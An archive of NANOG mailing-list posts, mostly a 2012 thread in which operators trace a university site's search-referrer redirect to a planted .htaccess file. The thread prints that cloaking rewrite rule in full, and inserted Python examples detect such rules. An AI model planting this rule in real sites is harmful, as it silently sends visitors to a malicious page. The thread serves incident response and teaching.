>> which redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, 
>> check your content (even that stored in a database) for anything that 
>> might be altering data based on referrer.  This simple test shows what I 
>> mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu
>> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
>> <html><head>
>> <title>301 Moved Permanently</title>
>> </head><body>
>> <h1>Moved Permanently</h1>
>> <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
>> </body></html>
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. 
>> > No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer 
>> > and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and 
>> > injecting a
>> redirect on the wire?  We've seen this before with a Windows machine 
>> being infected.
>> > On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
>> > Google Safe Browsing and Firefox have marked our website as 
>> > containing
>> malware. They claim our home page returns no results, but redirects 
>> users to another compromised website couchtarts.com.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files 
>> > and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach 
>> > www.csulb.edu
>> >
>> >
>> >
>> > --
>> > Landon Stewart <lstew...@superb.net>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199
>> > Web hosting and more "Ahead of the Rest":
>> > http://www.superbhosting.net
>> >
>>
>>
>>
>>
>>





RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Yes, thanks. I'll have to read up on that.

My e-mail was showing extra stuff at the end of the sample command lines, which 
confused me:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
...###

Sigh, I just Outlook not to strip extra line breaks.


matthew black
information technology services
california state university, long beach



-Original Message-
From: John Levine [mailto:jo...@iecc.com] 
Sent: Tuesday, June 26, 2012 10:30 PM
To: nanog@nanog.org
Cc: Matthew Black
Subject: Re: DNS poisoning at Google?

In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what 
>are results. Are you suggesting that when google refers to our website, we 
>pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I fetch the 
home page from csulb.edu or www.csulb.edu with Google as the referrer, it 
returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu
><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
><html><head>
><title>301 Moved Permanently</title>
></head><body>
><h1>Moved Permanently</h1>
><p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
></body></html>




RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

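Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>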


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>
>
>
> --
> Landon Stewart <lstew...@superb.net>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest":
> http://www.superbhosting.net
>






--
Landon Stewart <lstew...@superb.net>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net



RE: DNS poisoning at Google?

2012-06-27 Thread Matthew Black
We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens if you get on a subnet that can access the webservers directly 
and bypass the load balancer?  Try curl then and see if it's something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu>
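
Added example, not part of the original thread: a Python version of the check the replies ran by hand with curl and telnet. It fetches the page with no Referer, then with several, and reports each referrer that draws an off-site 3xx which the baseline does not. The host names, the `referer-probe/1.0` User-Agent, the `connect_to` parameter and the `constructed_origin` stand-in server are assumptions made up for the illustration.

```python
"""Probe a site for referrer-conditional (cloaked) redirects."""
import http.client
from urllib.parse import urlsplit

# The thread saw redirects for google, facebook, youtube and ebay referrers
# but not for amazon, so a single probe can miss the behaviour.
REFERERS = [
    "http://www.google.com/",
    "http://www.facebook.com/",
    "http://www.youtube.com/",
    "http://www.ebay.com/",
    "http://www.amazon.com/",
]


def http_fetch(site_host, connect_to=None, port=80, path="/", timeout=10):
    """Build fetch(referer) -> (status, Location) for a live server.

    connect_to lets you hit one backend directly (bypassing a load balancer)
    while still sending the public Host header.
    """
    def fetch(referer):
        headers = {"Host": site_host, "User-Agent": "referer-probe/1.0"}
        if referer is not None:
            headers["Referer"] = referer
        conn = http.client.HTTPConnection(connect_to or site_host, port,
                                          timeout=timeout)
        try:
            conn.request("GET", path, headers=headers)  # redirects not followed
            resp = conn.getresponse()
            return resp.status, resp.getheader("Location")
        finally:
            conn.close()
    return fetch


def is_offsite(location, site_host):
    """True when a Location header names a host outside the site's domain."""
    if not location:
        return False
    host = urlsplit(location).hostname
    if host is None:  # relative redirect stays on the site
        return False
    host, site = host.lower().rstrip("."), site_host.lower().rstrip(".")
    bare = site[4:] if site.startswith("www.") else site
    return not (host == bare or host.endswith("." + bare))


def probe(fetch, site_host, referers=REFERERS):
    """Compare each referrer's response with the no-referrer baseline."""
    baseline = fetch(None)
    findings = []
    for ref in referers:
        status, location = fetch(ref)
        differs = (status, location) != baseline
        if differs and 300 <= status < 400 and is_offsite(location, site_host):
            findings.append({"referer": ref, "status": status,
                             "location": location})
    return baseline, findings


def constructed_origin(referer):
    """Constructed stand-in for a server behaving as the thread observed."""
    trigger = ("google", "facebook", "youtube", "ebay")
    if referer and any(name in referer for name in trigger):
        return 301, "http://offsite.example/landing"
    return 200, None


if __name__ == "__main__":
    base, hits = probe(constructed_origin, "www.site.example")
    print("baseline:", base)
    for h in hits:
        print("CLOAKED  referer=%(referer)s -> %(status)s %(location)s" % h)
    # Against your own site: probe(http_fetch("www.site.example"), "www.site.example")
```

Running the probe once through the load balancer and once per backend (via `connect_to`) shows whether every server carries the rule or only some of them.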

RE: DNS poisoning at Google?

2012-06-27 Thread Matthew Black
Yes, we did that and also noted the username and IP address from where the FTP 
upload originated.

matthew black
information technology services
california state university, long beach



-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Wednesday, June 27, 2012 12:37 AM
To: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."







RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Matthew Black
Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

  # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))
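
Added example, not part of the original thread: a Python scanner for the kind of rule in the posted .htaccess, a RewriteCond on the Referer (or User-Agent) followed by a RewriteRule whose target is an absolute URL on another host. For each hit it records the file's timestamp, owner and SHA-256 so that evidence is captured before the file is removed, as advised earlier in the thread. The two sample files and the names `site.example` and `offsite.example` are constructed.

```python
"""Find .htaccess rules that redirect off-site based on Referer/User-Agent."""
import hashlib
import os
import re
import tempfile
import time
from urllib.parse import urlsplit

COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

# Constructed samples. BENIGN holds hotlink protection and a canonical-host
# redirect; INJECTED imitates the shape of the posted file with a short list.
BENIGN = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?site\.example/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F]
RewriteCond %{HTTP_HOST} ^site\.example$ [NC]
RewriteRule ^(.*)$ http://www.site.example/$1 [R=301,L]
"""
INJECTED = r"""#c0ffee#
RewriteEngine On
RewriteCond %{HTTP_REFERER} \
 ^.*(google|facebook|youtube|ebay)\.(.*)
RewriteRule ^(.*)$ http://offsite.example/landing.php [R=301,L]
#/c0ffee#
"""


def logical_lines(text):
    """Yield (line_number, line) with Apache backslash continuations joined."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        start = n if start is None else start
        if raw.endswith("\\"):
            buf += raw[:-1]
            continue
        yield start, buf + raw
        buf, start = "", None


def offsite(url, site_hosts):
    """True when url is absolute and its host is not one of site_hosts."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or "%{" in parts.netloc:
        return False  # relative path, "-", or a server-variable host
    return bool(parts.hostname) and parts.hostname.lower() not in site_hosts


def scan_text(text, site_hosts):
    """Return findings for conditional rewrites whose target is off-site."""
    site_hosts = {h.lower() for h in site_hosts}
    findings, pending = [], []
    for n, line in logical_lines(text):
        cond = COND.match(line)
        rule = RULE.match(line)
        if cond:
            pending.append(cond.group(1).upper())
        elif rule:
            if pending and offsite(rule.group(1), site_hosts):
                findings.append({"line": n, "variables": sorted(set(pending)),
                                 "target": rule.group(1)})
            pending = []  # conditions bind only to the next RewriteRule
    return findings


def evidence(path):
    """Metadata worth recording before the file is touched or removed."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_mtime))
    return {"path": path, "mtime_utc": stamp, "uid": st.st_uid, "sha256": digest}


def scan_tree(root, site_hosts):
    """Walk root and scan every .htaccess, attaching evidence to each hit."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read(), site_hosts)
            results += [{**hit, **evidence(path)} for hit in hits]
    return results


def demo():
    """Build a constructed document root with both samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        for rel, body in ((".htaccess", BENIGN), ("images/.htaccess", INJECTED)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, {"site.example", "www.site.example"})


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The scan walks every directory because a per-directory .htaccess below the document root applies just as the root one does.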






RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Matthew Black
By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

NetRange:       208.88.8.0 - 208.88.11.255
CIDR:           208.88.8.0/22
OriginAS:       AS40603
NetName:        SKYWIRE-SG
NetHandle:      NET-208-88-8-0-1
Parent:         NET-208-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.skywireusa.com
RegDate:        2008-03-04
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:        Sky Wire Communications
OrgId:          DGSU
Address:        946 W Sunset Blvd Ste L
City:           St George
StateProv:      UT
PostalCode:     84770
Country:        US
RegDate:        2007-12-04
Updated:        2009-11-04
Ref:            http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in Southern 
Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar 
City, and Enoch. It is the goal of SkyWire Communications to provide high speed 
internet access to 100 Percent of Southern Utah. We are located in St George, 
Utah.




matthew black
information technology services
california state university, long beach



-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Wednesday, June 27, 2012 9:52 AM
To: 'Jason Hellenthal'; Arturo Servin
Cc: nanog@nanog.org
Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

      # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))









RE: Color vision for network techs

2012-08-31 Thread Matthew Black
Yeah, I had that trouble with the old Cabletron (Enterasys) network management 
software. About 6% of Euro-American males suffer from Deuteranopia. I cannot 
see the difference between dark green and dark red. Bright green and bright red 
are better. It was not possible to adjust the Cabletron software. Contrary to 
popular belief, most of us can easily tell the difference between red and green 
traffic signals.

Color-proficient readers can get an idea of our disability from this website 
that sells Photoshop filters for graphics artists:

http://www.vischeck.com

Check out the Examples.


matthew black
california state university, long beach



-Original Message-
From: Betsy Schwartz [mailto:betsy.schwa...@gmail.com] 
Sent: Friday, August 31, 2012 1:30 PM
To: nanog@nanog.org
Subject: Re: Color vision for network techs

 I installed monitoring software with different colored status dots,
and discovered that we had three color-blind team members. After a
pleasant hour's tweaking I ended up with green diamonds, red X's,
purple squares, and yellow exclamation points (and on this particular
application a mouse-over would also tell you the name of the color
gif) Looked better for *everyone*.






HXXP browser protocol

2012-09-13 Thread Matthew Black
Checking if anyone else has heard of this protocol. It seems to be a method of 
bypassing security filtering software.

The reason I ask is that we received a security alert with a link 
hxxp://pastebin.com/###.

Seems very suspicious and want to know if anyone can shed light. Is this a new 
phishing/malware methodology?

matthew black
california state university, long beach



RE: Gmail and SSL

2012-12-14 Thread Matthew Black
A major problem with free or low-cost certificates is that their intermediate 
CA certificate does not always point back to a root certificate in client 
machines and/or software.

matthew black
california state university, long beach



-Original Message-
From: Peter Kristolaitis [mailto:alte...@alter3d.ca] 
Sent: Friday, December 14, 2012 7:53 AM
To: nanog@nanog.org
Subject: Re: Gmail and SSL

On 12/14/2012 10:47 AM, Randy wrote:
> I don't have hundreds of dollars to get my ssl certificates signed

You can get single-host certificates issued for free from StartSSL, or 
for very cheaply (under $10) from low-cost providers like CheapSSL.com.  
I've never had a problem having my StartSSL certs verified by anyone.

- Pete






RE: why haven't ethernet connectors changed?

2012-12-21 Thread Matthew Black
Are you talking about the "N" connectors with those 802.3 transceiver cables, 
BNC connectors (10Base5), or a Type RJ45 (10Base-T) telco style connector?

I couldn't find anyone selling multi-step thicknet strippers in the late 1980s, 
so I had to use a Xacto knife to prepare thicknet cable and then crimp about 20 
N connectors. Data General donated 8 workstations and CAD circuit-design 
software to our University. The workstations used N-style transceivers instead 
of those with vampire taps.

What a nightmare!  )-;

matthew black
california state university, long beach


-Original Message-
From: Michael Thomas [mailto:m...@mtcc.com] 
Sent: Thursday, December 20, 2012 10:20 AM
To: NANOG list
Subject: why haven't ethernet connectors changed?

I was looking at a Raspberry Pi board and was struck with how large the ethernet
connector is in comparison to the board as a whole. It strikes me: ethernet
connectors haven't changed that I'm aware in pretty much 25 years. Every other
cable has changed several times in that time frame. I imagine that if anybody
cared, ethernet cables could be many times smaller. Looking at wiring closets,
etc, it seems like it might be a big win for density too.

So why, oh why, nanog the omniscient do we still use rj45's?

Mike






RE: why haven't ethernet connectors changed?

2012-12-21 Thread Matthew Black
http://www.blackbox.com/Store/Detail.aspx/Ethernet-Transceiver-Cable-Office-Environment-PVC-IEEE-802-3-Right-Angle-Connector-3-ft-0-9-m/LCN216%C4%820003

Only $55.95 for a 3-foot transceiver cable. What was more surprising is that 
Black Box is still around.


matthew black
california state university, long beach


-Original Message-
From: Michael Thomas [mailto:m...@mtcc.com] 
Sent: Thursday, December 20, 2012 10:20 AM
To: NANOG list
Subject: why haven't ethernet connectors changed?

I was looking at a Raspberry Pi board and was struck with how large the ethernet
connector is in comparison to the board as a whole. It strikes me: ethernet
connectors haven't changed that I'm aware in pretty much 25 years. Every other
cable has changed several times in that time frame. I imagine that if anybody
cared, ethernet cables could be many times smaller. Looking at wiring closets,
etc, it seems like it might be a big win for density too.

So why, oh why, nanog the omniscient do we still use rj45's?

Mike









RE: Windows 10 Release

2015-07-30 Thread Matthew Black
Are users required to create any type of Microsoft cloud account (e.g., 
OneDrive, Office365, et alii) in order to install and use Windows 10? Or 
Office? Is it possible to simply use Windows 10 without any Microsoft or Google 
or Yahoo accounts? 

Is the unique identifier available to advertisers only through IE (or its 
successor) OR will it also be available through Firefox/Chrome?


matthew black
california state university, long beach


Verizon exiting California

2015-07-30 Thread Matthew Black
Verizon sent me a letter the other day stating that they are selling their 
landline business to Frontier Communications. It was a very terse letter and as 
a customer I don't know if it affects me. While stating they aren't exiting the 
Wireless business, I want to know which parts are being sold off. Just the 
copper lines, POTS, DSL, FIOS (TV, Internet, phone)? Some clarity would be 
great.  I am a FIOS only customer. Can anyone recall if GTE was blocked from 
doing the same thing a few decades ago?

matthew black
california state university, long beach


RE: Verizon exiting California

2015-07-30 Thread Matthew Black
Never mind. I found a February article detailing the plan.

arstechnica: Verizon sells three-state territory, including 1.6 million FiOS 
users
http://arstechnica.com/business/2015/02/verizon-sells-three-state-territory-including-1-6-million-fios-users/

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Black
Sent: Thursday, July 30, 2015 9:26 AM
To: North American Network Operators' Group (nanog@nanog.org)
Subject: Verizon exiting California

Verizon sent me a letter the other day stating that they are selling their 
